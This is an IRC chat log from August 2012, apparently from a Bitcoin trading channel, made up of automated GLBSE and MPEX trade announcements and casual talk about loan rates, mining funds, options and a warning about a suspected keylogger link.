@ 0.00034655 = 0.6584 BTC [+] Aug 12 02:00:45 that's not a bad idea. you could argue any trading system should have that kind of feature, but most dont Aug 12 02:00:49 [GLBSE] [OBSI.HRPT] 1 @ 0.10896 BTC [+] Aug 12 02:01:03 Indeed Aug 12 02:03:38 Not sure the 5 day average is already loaded on page but eh Aug 12 02:03:42 Hmm.... Aug 12 02:05:08 I meant the 7 day average Aug 12 02:05:29 5 day is there. Maybe I should make a small script for greasmonkey using the onpage 5 day average... trigerring when submitting the buy/sell form Aug 12 02:05:49 I have never used javascript however. Aug 12 02:05:55 [MPEX] [S.MPOE] 799 @ 0.00034655 = 0.2769 BTC [+] Aug 12 02:05:56 [MPEX] [S.MPOE] 42601 @ 0.00034666 = 14.7681 BTC [+] Aug 12 02:06:05 don't forget to have it alert when the 5 day is 0 Aug 12 02:06:15 Indeed Aug 12 02:06:31 The 5 day can be very low/high however Aug 12 02:06:50 depending if only the last trade is included Aug 12 02:06:57 and if it was out of the usual range Aug 12 02:07:34 I heard a rumor nefario is working on a new feature allowing to place multiple bids on different shares with the same funds Aug 12 02:07:50 yes that will be nice Aug 12 02:08:04 If he does that, any issue with low volume of bids would pretty much be gone. Aug 12 02:08:59 It might get processing intensive however checking with each transaction the funds remaining and removing other bids accordingly. Aug 12 02:09:46 no Aug 12 02:09:51 database intensive maybe hehe Aug 12 02:09:57 well, same thing ithink Aug 12 02:10:13 but all the remaining bids could be cleared at the same time by a key number Aug 12 02:10:24 Pretty much, intensive in queries Aug 12 02:10:35 and database queries tend to be intensive all around Aug 12 02:10:56 still, best option for rapidly changing data Aug 12 02:11:34 its a bad idea imo Aug 12 02:11:48 it will be removed when volume increases Aug 12 02:12:00 it will be the source of many issues hehe Aug 12 02:13:11 That's half true. Suppose price is 1 and 2 on different shares and you have 18 BTC. You might want to buy those at 0.9 BTC or 1.8BTC each, with no preference as to which to buy first. Aug 12 02:13:55 As such, being able two place multiple bid on the same balance would be interesting to insure you can buy the first that gets an ask coming in. Aug 12 02:14:13 But yes, it would also have disdvantages too Aug 12 02:15:53 On a side note, I still have my 0.5% weekly loan bonds that are not selling. Currently backed at 13990:1 Aug 12 02:18:22 What's the lowest rate people would require on a loan? Aug 12 02:20:17 Ah, this channel is sleeping Aug 12 02:22:18 [GLBSE] [OBSI.HRPT] 5 @ 0.10896 = 0.5448 BTC [+] Aug 12 02:22:46 7% seems to work ;> Aug 12 02:24:11 [GLBSE] [SYNERGY] 3 @ 0.19589999 = 0.5877 BTC [-] Aug 12 02:28:00 [GLBSE] [SYNERGY] 5 @ 0.1959 = 0.9795 BTC [+] Aug 12 02:29:51 I hate that answer ;P Aug 12 02:30:36 It's 28x the rate my bank would provide loans with. Aug 12 02:31:24 and about 120x a loan rate backed by a house =/ Aug 12 02:31:53 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 12 02:40:02 [GLBSE] [MERGEDMINING] 12 @ 0.09 = 1.08 BTC [-] Aug 12 02:41:16 [GLBSE] [OBSI.HRPT] 6 @ 0.1085 = 0.651 BTC [-] Aug 12 02:43:12 [GLBSE] [JTME] 1 @ 0.9997 BTC [-] Aug 12 02:44:25 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC Aug 12 02:47:00 [GLBSE] [BITBOND] 6 @ 0.3799 = 2.2794 BTC [+] Aug 12 02:48:37 [GLBSE] [BDT] 1 @ 1.0599 BTC [-] Aug 12 02:52:43 [GLBSE] [PAJKA.BOND] 30 @ 0.08997989 = 2.6994 BTC [-] Aug 12 02:59:53 BTC-Mining: why would anyone loan you money Aug 12 02:59:58 [GLBSE] [FPGAMINING] 1 @ 0.85 BTC [+] Aug 12 03:00:39 [GLBSE] [YABMC] 5 @ 0.1187 = 0.5935 BTC [-] Aug 12 03:00:41 [GLBSE] [YABMC] 4 @ 0.1188 = 0.4752 BTC [+] Aug 12 03:05:29 1-3% a week usually works :) Aug 12 03:05:50 as long as you have some reputation and you can guarantee that you can pay it back Aug 12 03:13:01 There's plenty of loans going around Diablo Aug 12 03:13:43 Yes, I suppose I could go up to 1%... still seems like a lot at 52% per year however. Aug 12 03:15:00 [MPEX] [S.MPOE] 14727 @ 0.00034666 = 5.1053 BTC [+] Aug 12 03:15:01 This is Bitcoins :P Aug 12 03:15:02 [MPEX] [S.MPOE] 73 @ 0.00034672 = 0.0253 BTC [+] Aug 12 03:15:13 Every month in the Bitcoin economy is a year in real life :P Aug 12 03:16:34 ^ Aug 12 03:16:52 The loan can increase or decrease in $ value by far more than 1% in a week :P Aug 12 03:18:37 [GLBSE] [CIUCIU.BOND] 3 @ 0.09999 = 0.3 BTC [-] Aug 12 03:18:38 [GLBSE] [CIUCIU.BOND] 1 @ 0.1 BTC [+] Aug 12 03:21:38 [GLBSE] [FUTUREFUND] 1 @ 0.0001 BTC [-] Aug 12 03:21:43 [GLBSE] [BTCWEB] 1 @ 0.04 BTC [-] Aug 12 03:22:04 [GLBSE] [ASICMINER] 11 @ 0.1 = 1.1 BTC Aug 12 03:23:11 [GLBSE] [BIF.BTCST.PPT] 4 @ 1.03 = 4.12 BTC [+] Aug 12 03:23:46 ARGH! Aug 12 03:24:10 Not going to start again =/ Aug 12 03:36:04 [GLBSE] [NASTY] 1 @ 0.6 BTC [+] Aug 12 03:46:41 [GLBSE] [GIGAMINING] 1 @ 1.14089 BTC [+] Aug 12 03:46:42 [GLBSE] [GIGAMINING] 4 @ 1.140989 = 4.564 BTC [+] Aug 12 03:46:44 [GLBSE] [GIGAMINING] 2 @ 1.141 = 2.282 BTC [+] Aug 12 03:51:19 [GLBSE] [FUTUREFUND] 2000 @ 0.00011485 = 0.2297 BTC [+] Aug 12 03:52:22 [GLBSE] [ASICMINER] 1 @ 0.1 BTC Aug 12 03:52:47 [GLBSE] [FUTUREFUND] 300 @ 0.00011485 = 0.0345 BTC [+] Aug 12 03:53:42 [GLBSE] [FUTUREFUND] 34 @ 0.00011485 = 0.0039 BTC [+] Aug 12 04:01:20 [GLBSE] [TYGRR.BOND-P] 75 @ 1.04 = 78 BTC [+] Aug 12 04:01:54 [GLBSE] [FOO.PPPPT] 1 @ 1.0403 BTC [+] Aug 12 04:02:27 [MPEX] [S.MPOE] 11826 @ 0.00034672 = 4.1003 BTC [+] Aug 12 04:04:27 [GLBSE] [FPGA.CONTRACT] 1 @ 0.169899 BTC [-] Aug 12 04:16:18 [MPEX] [F.GIGA.ETF] 5600 @ 0.00110266 = 6.1749 BTC [-] Aug 12 04:26:15 [GLBSE] [GIGAMINING] 1 @ 1.1201 BTC [-] Aug 12 04:30:33 [MPEX] [S.MPOE] 10000 @ 0.000335 = 3.35 BTC [-] Aug 12 04:32:18 [GLBSE] [GIGAMINING] 4 @ 1.1201 = 4.4804 BTC [-] Aug 12 04:32:20 [GLBSE] [GIGAMINING] 10 @ 1.12 = 11.2 BTC [-] Aug 12 04:41:54 [MPEX] [S.MPOE] 44647 @ 0.00034672 = 15.48 BTC [+] Aug 12 04:41:55 [MPEX] [S.MPOE] 2630 @ 0.0003469 = 0.9123 BTC [+] Aug 12 05:00:40 [MPEX] [S.MPOE] 26830 @ 0.0003469 = 9.3073 BTC [+] Aug 12 05:00:42 [MPEX] [S.MPOE] 6567 @ 0.00034699 = 2.2787 BTC [+] Aug 12 05:05:23 ATTENTION: IF YOU HAVE RECEIVED A PRIVATE MESSAGE WITH A LINK TO http://tinyurl.com/bunnyxxxxx DO NOT DOWNLOAD THIS APPLICATION Aug 12 05:07:10 who cares Aug 12 05:07:13 we all run linux anyhow Aug 12 05:07:18 probably doesnt even work in wine Aug 12 05:17:27 [GLBSE] [OBSI.HRPT] 6 @ 0.10738 = 0.6443 BTC [-] Aug 12 05:39:26 Diablo-D3 ++ lol Aug 12 05:39:52 what is it coingenuity, some wallet stealer ? Aug 12 05:53:46 [MPEX] [S.MPOE] 35109 @ 0.00034116 = 11.9778 BTC [-] Aug 12 05:59:06 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 12 06:15:23 [MPEX] [S.MPOE] 2833 @ 0.00034699 = 0.983 BTC [+] Aug 12 06:15:24 [MPEX] [S.MPOE] 14867 @ 0.00034776 = 5.1701 BTC [+] Aug 12 06:45:40 [GLBSE] [OBSI.HRPT] 40 @ 0.10737 = 4.2948 BTC [-] Aug 12 06:46:21 [GLBSE] [OBSI.HRPT] 2 @ 0.10737 = 0.2147 BTC [-] Aug 12 07:01:02 [GLBSE] [GIPPT] 5 @ 1.224 = 6.12 BTC [-] Aug 12 07:01:27 [MPEX] [S.MPOE] 9095 @ 0.00034776 = 3.1629 BTC [+] Aug 12 07:01:28 [MPEX] [S.MPOE] 13105 @ 0.00034897 = 4.5733 BTC [+] Aug 12 07:04:00 [MPEX] [S.MPOE] 1761 @ 0.00034897 = 0.6145 BTC [+] Aug 12 07:04:01 [MPEX] [S.MPOE] 593 @ 0.00034924 = 0.2071 BTC [+] Aug 12 07:04:57 [GLBSE] [GIPPT] 4 @ 1.247 = 4.988 BTC [+] Aug 12 07:05:25 [GLBSE] [GIPPT] 5 @ 1.248 = 6.24 BTC [+] Aug 12 07:10:14 well coingenuity provided no answer... sadly Aug 12 07:11:29 mircea_popescu: BTC-Mining keylogger Aug 12 07:13:03 well, that sounds bad eh Aug 12 07:14:06 hmm, seems the link was deactived. Convenient. Aug 12 07:14:47 [GLBSE] [OBSI.HRPT] 1 @ 0.10737 BTC [-] Aug 12 07:15:19 OBSI.HRPT... risky share Aug 12 07:15:44 exactly the same kind of risk/reward Aug 12 07:18:06 heh Aug 12 07:18:25 I wish we could get the full specifics details about those operations. Aug 12 07:18:31 [GLBSE] [TYGRR.BOND-P] 4 @ 1.04 = 4.16 BTC [+] Aug 12 07:21:32 [GLBSE] [TYGRR.BOND-A] 1 @ 0.154 BTC [-] Aug 12 07:37:22 coingenuity nasty. Aug 12 07:39:31 BTC-Mining what share is it ? Aug 12 07:39:54 OBSI.HRPT Aug 12 07:40:17 well, pirate too, which has many shares reselling the investment Aug 12 07:42:55 On another note: http://www.youtube.com/watch?v=nnmbKPh6qqs Aug 12 07:43:28 I'm unsure why cavirtex decided to promote them Aug 12 07:45:43 BTC-Mining yea but i mean what does it do ? Aug 12 07:45:50 it's a share of what ? Aug 12 07:46:04 Mining share Aug 12 07:46:06 280 views. ouch. Aug 12 07:46:28 Cavirtex is a very small exchange to start with... Aug 12 07:46:46 Not so many Canadians that are fans of bitcoins Aug 12 07:46:51 i didn't even know youtube counted views to that granularity. Aug 12 07:47:08 it counts to the 1 Aug 12 07:48:57 As far as I know, their stats are very accurate and detailed. Aug 12 07:49:24 And "partner" accounts get a share of revenue too (for actual content creators). Aug 12 07:49:50 So long as it's their videos and it does not contain any brand/copyright music seen or heard within Aug 12 07:50:58 aha ? cool. Aug 12 07:52:44 Well it is owned by google now... and they do are great for stat tools and revenue sharing will sorts of partner tools Aug 12 08:03:05 [MPEX] [S.BVPS] 1300 @ 0.00356657 = 4.6365 BTC [+] Aug 12 08:13:07 Poll: if you were to catch a sale of shares from a large typo, would you be willing to let their owner buy them back if they requested it explaining the situation? Aug 12 08:25:03 no. Aug 12 08:25:42 btw, do you know about that 1bn shares sale on the japan market ? Aug 12 08:25:51 was am istake by like 3 degrees of magnitude, went through Aug 12 08:29:31 Nope Aug 12 08:30:10 I know people here who would have accepted however to refund Aug 12 08:31:31 Although I must say most around are individuals who know each other and not large funds/corporation/legal entities Aug 12 08:33:04 3 orders of magnitude? Like shares worth $20 sold at $0.20? Aug 12 08:37:12 [GLBSE] [BDT] 10 @ 1.0597 = 10.597 BTC [-] Aug 12 08:37:14 [GLBSE] [BDT] 18 @ 1.0598 = 19.0764 BTC [+] Aug 12 08:37:15 [GLBSE] [BDT] 17 @ 1.0599 = 18.0183 BTC [+] Aug 12 08:37:16 [GLBSE] [BDT] 15 @ 1.06 = 15.9 BTC [+] Aug 12 08:38:28 ;;later tell btc-mining no, like an order for 1mn shares was turned into one for 1bn shares. Aug 12 08:38:29 The operation succeeded. Aug 12 08:44:19 [GLBSE] [TYGRR.BOND-P] 2 @ 1.04 = 2.08 BTC [+] Aug 12 08:47:13 [MPEX] [F.GIGA.ETF] 800 @ 0.00110278 = 0.8822 BTC [+] Aug 12 08:50:50 [GLBSE] [CPA] 10 @ 0.10296 = 1.0296 BTC [+] Aug 12 09:08:54 [GLBSE] [PPT.A] 1 @ 1.1101 BTC [+] Aug 12 09:09:09 [GLBSE] [GMVT-BOT] 2 @ 0.1 = 0.2 BTC [-] Aug 12 09:09:25 [GLBSE] [MOVETO.FUND] 1 @ 1.069 BTC [-] Aug 12 09:09:26 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:11:27 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 12 09:27:11 [MPEX] [S.BVPS] 17 @ 0.00356657 = 0.0606 BTC [+] Aug 12 09:28:09 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 12 09:29:23 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:34:56 [GLBSE] [ASICMINER] 1 @ 0.1 BTC Aug 12 09:37:41 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:38:52 [GLBSE] [TYGRR.BOND-P] 8 @ 1.04 = 8.32 BTC [+] Aug 12 09:39:46 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 12 09:41:30 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:43:30 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:44:00 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:44:09 [GLBSE] [YABMC] 18 @ 0.1188 = 2.1384 BTC [+] Aug 12 09:44:10 [GLBSE] [YABMC] 5 @ 0.119 = 0.595 BTC [+] Aug 12 09:44:11 [GLBSE] [YABMC] 44 @ 0.12 = 5.28 BTC [+] Aug 12 09:44:51 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:45:30 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:46:14 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:46:36 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:46:50 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:47:12 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:47:33 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 09:47:50 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 12 10:05:54 [GLBSE] [TYGRR.BOND-P] 10 @ 1.04 = 10.4 BTC [+] Aug 12 10:18:20 [MPEX] [O.HASH.P10TH] 150000 @ 0.01666535 = 2499.8025 BTC [-] **** BEGIN LOGGING AT Sun Aug 12 16:29:55 2012 Aug 12 16:32:08 [GLBSE] [ASICMINER] 3 @ 0.1 = 0.3 BTC Aug 12 16:40:39 [GLBSE] [FPGA-EU] 1 @ 0.195 BTC [+] Aug 12 16:47:50 [GLBSE] [BITBOND] 6 @ 0.3851 = 2.3106 BTC [+] Aug 12 16:48:01 [GLBSE] [GOLD] 8 @ 0.01 = 0.08 BTC [+] Aug 12 16:49:32 BMF paid dividends (1.22% on 0.72btc/share, NAV is now 0.73) Aug 12 16:54:42 [GLBSE] [OBSI.HRPT] 2 @ 0.1049 = 0.2098 BTC [+] Aug 12 16:56:25 [GLBSE] [ASICMINER] 37 @ 0.1 = 3.7 BTC Aug 12 16:58:21 usagi what's bmf ? Aug 12 16:58:31 [GLBSE] [M.ETF] 2 @ 0.15 = 0.3 BTC [+] Aug 12 16:58:31 Bitcoin Mining Fund Aug 12 16:58:42 The largest and dare I say best run mining fund on the GLBSE Aug 12 16:58:47 tsukino.ca/bmf Aug 12 16:58:50 aha Aug 12 16:59:02 I will be updating the page shortly, the fund was in sleepwalking mode for the last month Aug 12 16:59:08 because of the minign crash Aug 12 16:59:09 [GLBSE] [TEEK.USD] 10 @ 0.084 = 0.84 BTC [-] Aug 12 16:59:32 o hey, with nice assets discussion and everything on that blog. Aug 12 16:59:40 Yeah Aug 12 16:59:43 we need more of that. Aug 12 16:59:51 I will be publishing an interview with Juan of BTC-MINING this week. Aug 12 17:00:02 Kick off the week with a bang ^^ Aug 12 17:00:25 ya don't let it lapse you know ? Aug 12 17:00:33 Well my goal is to be the best in everything I do Aug 12 17:00:55 I just hried someone to do analysis and writeups Aug 12 17:01:06 So we will see if I can't get a few writeups/advisories out this month too Aug 12 17:02:16 very nice. Aug 12 17:02:42 I also write options for customers :p Aug 12 17:02:48 But we do it by hand, nothing on an exchange yet Aug 12 17:03:05 We paid out on a BMMO covered call just recently Aug 12 17:03:16 or was that a put, something like that Aug 12 17:03:19 o, you do options on the mining shares ? Aug 12 17:03:37 Yea but I do them by hand because there's no facility for backing it on the GLBSE. Aug 12 17:04:09 i could make a symbol on mpex but i don't think there's enough volume yet to warrant it. maybe on giga, tho... Aug 12 17:04:15 We can take the other side of covered calls as well, which is a popular option for customers Aug 12 17:04:49 All in good time mircea, i'm sure it will be facilitated soon Aug 12 17:04:58 One way or another :) Aug 12 17:05:18 [GLBSE] [IMPACT] 1 @ 0.009 BTC [+] Aug 12 17:05:21 yeah, no point in rushing things TOO much. Aug 12 17:08:39 [GLBSE] [OBSI.HRPT] 5 @ 0.1049 = 0.5245 BTC [+] Aug 12 17:08:52 [GLBSE] [MU] 1 @ 0.5099 BTC [+] Aug 12 17:09:14 [GLBSE] [OBSI.HRPT] 3 @ 0.1049 = 0.3147 BTC [+] Aug 12 17:14:02 [GLBSE] [BITBOND] 6 @ 0.3699 = 2.2194 BTC [-] Aug 12 17:16:36 [MPEX] [S.MPOE] 3914 @ 0.00034924 = 1.3669 BTC [+] Aug 12 17:16:38 [MPEX] [S.MPOE] 57077 @ 0.00034947 = 19.9467 BTC [+] Aug 12 17:16:39 [MPEX] [S.MPOE] 48886 @ 0.00035001 = 17.1106 BTC [+] Aug 12 17:16:40 [MPEX] [S.MPOE] 51400 @ 0.00035029 = 18.0049 BTC [+] Aug 12 17:16:42 [MPEX] [S.MPOE] 600 @ 0.0003506 = 0.2104 BTC [+] Aug 12 17:16:43 [MPEX] [S.MPOE] 25614 @ 0.00035145 = 9.002 BTC [+] Aug 12 17:16:44 [MPEX] [S.MPOE] 67872 @ 0.00035149 = 23.8563 BTC [+] Aug 12 17:16:45 [MPEX] [S.MPOE] 64108 @ 0.00035159 = 22.5397 BTC [+] Aug 12 17:16:45 [MPEX] [S.MPOE] 50367 @ 0.00035192 = 17.7252 BTC [+] Aug 12 17:16:46 [MPEX] [S.MPOE] 3121 @ 0.00035266 = 1.1007 BTC [+] Aug 12 17:16:47 [MPEX] [S.MPOE] 37203 @ 0.00035523 = 13.2156 BTC [+] Aug 12 17:16:49 [MPEX] [S.MPOE] 42305 @ 0.0003554 = 15.0352 BTC [+] Aug 12 17:16:50 [MPEX] [S.MPOE] 64300 @ 0.00035672 = 22.9371 BTC [+] Aug 12 17:16:51 [MPEX] [S.MPOE] 11090 @ 0.00035748 = 3.9645 BTC [+] Aug 12 17:16:52 [MPEX] [S.MPOE] 20407 @ 0.00035763 = 7.2982 BTC [+] Aug 12 17:16:53 [MPEX] [S.MPOE] 7101 @ 0.00035896 = 2.549 BTC [+] Aug 12 17:16:54 [MPEX] [S.MPOE] 29070 @ 0.00035941 = 10.448 BTC [+] Aug 12 17:16:54 [MPEX] [S.MPOE] 35528 @ 0.00035961 = 12.7762 BTC [+] Aug 12 17:16:55 [MPEX] [S.MPOE] 36381 @ 0.00035967 = 13.0852 BTC [+] Aug 12 17:16:56 [MPEX] [S.MPOE] 13138 @ 0.00035996 = 4.7292 BTC [+] Aug 12 17:16:57 [MPEX] [S.MPOE] 15239 @ 0.0003601 = 5.4876 BTC [+] Aug 12 17:16:58 [MPEX] [S.MPOE] 16805 @ 0.00036022 = 6.0535 BTC [+] Aug 12 17:16:59 [MPEX] [S.MPOE] 39100 @ 0.0003603 = 14.0877 BTC [+] Aug 12 17:17:00 [MPEX] [S.MPOE] 912 @ 0.00036092 = 0.3292 BTC [+] Aug 12 17:17:02 [MPEX] [S.MPOE] 4070 @ 0.00036156 = 1.4715 BTC [+] Aug 12 17:17:03 [MPEX] [S.MPOE] 23241 @ 0.00036171 = 8.4065 BTC [+] Aug 12 17:17:04 [MPEX] [S.MPOE] 53381 @ 0.00036295 = 19.3746 BTC [+] Aug 12 17:17:04 [MPEX] [S.MPOE] 42478 @ 0.00036328 = 15.4314 BTC [+] Aug 12 17:17:05 [MPEX] [S.MPOE] 29025 @ 0.00036435 = 10.5753 BTC [+] Aug 12 17:17:06 [MPEX] [S.MPOE] 2500 @ 0.00036448 = 0.9112 BTC [+] Aug 12 17:17:07 [MPEX] [S.MPOE] 59100 @ 0.00036451 = 21.5425 BTC [+] Aug 12 17:17:08 [MPEX] [S.MPOE] 40086 @ 0.00036468 = 14.6186 BTC [+] Aug 12 17:17:09 [MPEX] [S.MPOE] 4581 @ 0.00036484 = 1.6713 BTC [+] Aug 12 17:27:02 [GLBSE] [BBBB] 155 @ 0.000238 = 0.0369 BTC [-] Aug 12 17:30:20 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 12 17:32:03 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC Aug 12 17:38:56 [GLBSE] [PAJKA.BOND] 8 @ 0.05 = 0.4 BTC [-] Aug 12 17:39:22 [GLBSE] [ASICMINER] 199 @ 0.1 = 19.9 BTC Aug 12 17:43:42 S.MPOE? Aug 12 17:45:15 an investment in mircea's options efforts I believe. Aug 12 17:45:33 [MPEX] [S.MPOE] 30719 @ 0.00036484 = 11.2075 BTC [+] Aug 12 17:45:35 [MPEX] [S.MPOE] 8581 @ 0.00036616 = 3.142 BTC [+] Aug 12 17:47:07 usagi: you got any .C laying around? Aug 12 17:47:24 soon Aug 12 17:47:29 im updating the spreadsheets Aug 12 17:47:34 then I will put them up for sale again Aug 12 17:47:46 dont panic they will go for 1 btc :) Aug 12 17:49:18 what is the ETA? Aug 12 17:50:16 15 minute Aug 12 17:50:21 Just put up a bid for 1 Aug 12 17:50:23 I'll fill it Aug 12 17:52:16 my PPT.C expired and I missed out on the auction while traveling Aug 12 17:52:23 [GLBSE] [OBSI.HRPT] 2 @ 0.1049 = 0.2098 BTC [+] Aug 12 17:53:11 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.62 BTC [-] Aug 12 17:54:00 [GLBSE] [ASICMINER] 13 @ 0.1 = 1.3 BTC Aug 12 17:55:20 [GLBSE] [BITBOND] 1 @ 0.37479999 BTC [+] Aug 12 17:56:58 [GLBSE] [YABMC] 2 @ 0.1242 = 0.2484 BTC [-] Aug 12 18:00:53 [GLBSE] [OBSI.HRPT] 1 @ 0.1049 BTC [+] Aug 12 18:08:09 [08:55:38] Diablo-D3, what did they say to make you belive in them :) Aug 12 18:08:19 what fab size Aug 12 18:08:31 and what specific fab type Aug 12 18:10:38 usagi: do people get mad when you do your weekly dump at 1? Aug 12 18:11:06 kakobrekla: Im not sure if the info should be public, so Im not repeating it, but they answered the questions approrpiately Aug 12 18:11:13 Why would they? Aug 12 18:11:32 If they buy in at 1.10 during the week and get a 8.5% payment Aug 12 18:11:40 the next day Aug 12 18:11:50 then they only really paid like 1.015 Aug 12 18:11:53 thats not a big deal Aug 12 18:11:55 [GLBSE] [BFLS] 2 @ 1 = 2 BTC [-] Aug 12 18:12:02 Some guy bought 50 shares at 1.50 Aug 12 18:12:18 I daresay he will have a chance to get out Aug 12 18:12:33 shares going up now Aug 12 18:12:38 place your bids gentlemen Aug 12 18:12:54 EskimoBob: btw, whats the difference between usagi and me? I buy DMC shares out when they're exceedingly cheap Aug 12 18:13:17 EskimoBob : http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Aug 12 18:13:23 [GLBSE] [BIF.BTCST.PPT] 1 @ 1.03 BTC [+] Aug 12 18:13:40 [GLBSE] [NYAN.A] 1 @ 1 BTC [-] Aug 12 18:14:09 Mmm..sales Aug 12 18:15:41 mmm..asset churn Aug 12 18:15:42 [GLBSE] [NYAN.B] 5 @ 1 = 5 BTC [-] Aug 12 18:16:29 i'm curious how you'd value assets for to churn them. Aug 12 18:16:50 [MPEX] [S.MPOE] 14725 @ 0.00036616 = 5.3917 BTC [+] Aug 12 18:16:51 [MPEX] [S.MPOE] 57267 @ 0.00036619 = 20.9706 BTC [+] Aug 12 18:16:52 [MPEX] [S.MPOE] 43137 @ 0.00036623 = 15.7981 BTC [+] Aug 12 18:16:53 [MPEX] [S.MPOE] 10229 @ 0.00036715 = 3.7556 BTC [+] Aug 12 18:16:54 [MPEX] [S.MPOE] 25324 @ 0.00036728 = 9.301 BTC [+] Aug 12 18:16:55 [MPEX] [S.MPOE] 51600 @ 0.00036782 = 18.9795 BTC [+] Aug 12 18:16:57 [MPEX] [S.MPOE] 18542 @ 0.00036804 = 6.8242 BTC [+] Aug 12 18:16:58 [MPEX] [S.MPOE] 49151 @ 0.0003684 = 18.1072 BTC [+] Aug 12 18:16:59 [MPEX] [S.MPOE] 34400 @ 0.00036856 = 12.6785 BTC [+] Aug 12 18:17:00 [MPEX] [S.MPOE] 66198 @ 0.00036858 = 24.3993 BTC [+] Aug 12 18:17:00 [MPEX] [S.MPOE] 626 @ 0.00036867 = 0.2308 BTC [+] Aug 12 18:17:01 [MPEX] [S.MPOE] 42985 @ 0.00036922 = 15.8709 BTC [+] Aug 12 18:17:02 [MPEX] [S.MPOE] 23180 @ 0.00036928 = 8.5599 BTC [+] Aug 12 18:17:03 [MPEX] [S.MPOE] 61866 @ 0.00036983 = 22.8799 BTC [+] Aug 12 18:17:04 [MPEX] [S.MPOE] 56602 @ 0.00036992 = 20.9382 BTC [+] Aug 12 18:17:06 [MPEX] [S.MPOE] 53131 @ 0.00036996 = 19.6563 BTC [+] Aug 12 18:17:07 [MPEX] [S.MPOE] 3501 @ 0.00037023 = 1.2962 BTC [+] Aug 12 18:17:08 [MPEX] [S.MPOE] 23271 @ 0.00037037 = 8.6189 BTC [+] Aug 12 18:17:09 [MPEX] [S.MPOE] 57619 @ 0.00037041 = 21.3427 BTC [+] Aug 12 18:17:09 [MPEX] [S.MPOE] 33343 @ 0.00037066 = 12.3589 BTC [+] Aug 12 18:17:10 [MPEX] [S.MPOE] 26408 @ 0.00037097 = 9.7966 BTC [+] Aug 12 18:17:11 [MPEX] [S.MPOE] 47870 @ 0.00037119 = 17.7689 BTC [+] Aug 12 18:17:12 [MPEX] [S.MPOE] 48910 @ 0.00037171 = 18.1803 BTC [+] Aug 12 18:17:13 [MPEX] [S.MPOE] 64861 @ 0.00037183 = 24.1173 BTC [+] Aug 12 18:17:14 [MPEX] [S.MPOE] 17844 @ 0.00037184 = 6.6351 BTC [+] Aug 12 18:17:15 [MPEX] [S.MPOE] 46802 @ 0.00037236 = 17.4272 BTC [+] Aug 12 18:17:16 [MPEX] [S.MPOE] 20608 @ 0.00037361 = 7.6994 BTC [+] Aug 12 18:17:26 mk this is getting out of hand. Aug 12 18:18:15 [GLBSE] [NYAN.C] 10 @ 1.01 = 10.1 BTC [-] Aug 12 18:18:17 [GLBSE] [NYAN.C] 5 @ 1.009 = 5.045 BTC [-] Aug 12 18:18:18 [GLBSE] [NYAN.C] 1 @ 1.005 BTC [-] Aug 12 18:18:19 [GLBSE] [NYAN.C] 5 @ 1.00000011 = 5 BTC [-] Aug 12 18:18:21 [GLBSE] [NYAN.C] 10 @ 1 = 10 BTC [-] Aug 12 18:18:22 [GLBSE] [NYAN.C] 20 @ 1 = 20 BTC [-] Aug 12 18:18:22 [GLBSE] [NYAN.C] 50 @ 1 = 50 BTC [-] Aug 12 18:19:11 Diablo-D3: nothing wrong with your fond but I think you are too deep in "bonds" - actually, I have not see the last investment report and I can be wrong Aug 12 18:20:11 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 12 18:20:22 I still hold DMC looks like someone had a panic attack - 0.00000001 Aug 12 18:21:01 fwiw, i hate the fact that https://glbse.com/asset/view/DMC works but https://glbse.com/asset/view/dmc does not. Aug 12 18:21:09 how hard is it to do! Aug 12 18:21:34 mircea_popescu: just a rewrite rule Aug 12 18:21:37 yeah. Aug 12 18:21:39 EskimoBob: or a breached GLBSE account that was cleared out Aug 12 18:21:50 but "D" is not same as "d" in linux world :) Aug 12 18:21:50 [MPEX] [O.HASH.P10TH] 150000 @ 0.01993505 = 2990.2575 BTC [+] Aug 12 18:22:07 EskimoBob i know that, im just saying, it's a line in htaccess. Aug 12 18:22:07 Lol Aug 12 18:22:14 Just wait til obsi makes his bidwall Aug 12 18:22:21 then you will see spam. Aug 12 18:22:51 not cool at all Aug 12 18:22:59 wait Diablo-D3 runs a fund ? thought it was a straight miner. Aug 12 18:23:08 Well it depends who you ask Aug 12 18:26:32 [MPEX] [F.GIGA.ETF] 3072 @ 0.00111919 = 3.4382 BTC [+] Aug 12 18:26:33 [MPEX] [F.GIGA.ETF] 5933 @ 0.00112857 = 6.6958 BTC [+] Aug 12 18:26:35 [MPEX] [F.GIGA.ETF] 5864 @ 0.00112948 = 6.6233 BTC [+] Aug 12 18:26:36 [MPEX] [F.GIGA.ETF] 8944 @ 0.00113011 = 10.1077 BTC [+] Aug 12 18:26:37 [MPEX] [F.GIGA.ETF] 1187 @ 0.0011304 = 1.3418 BTC [+] Aug 12 18:27:36 Each share represents 0% of the ownership in the company assets. Aug 12 18:27:43 this is an interesting way to go about it lol Aug 12 18:28:23 [GLBSE] [FOO.PPPPT] 5 @ 1.0403 = 5.2015 BTC [+] Aug 12 18:29:29 anyone know who runs quickco.in ? Aug 12 18:33:26 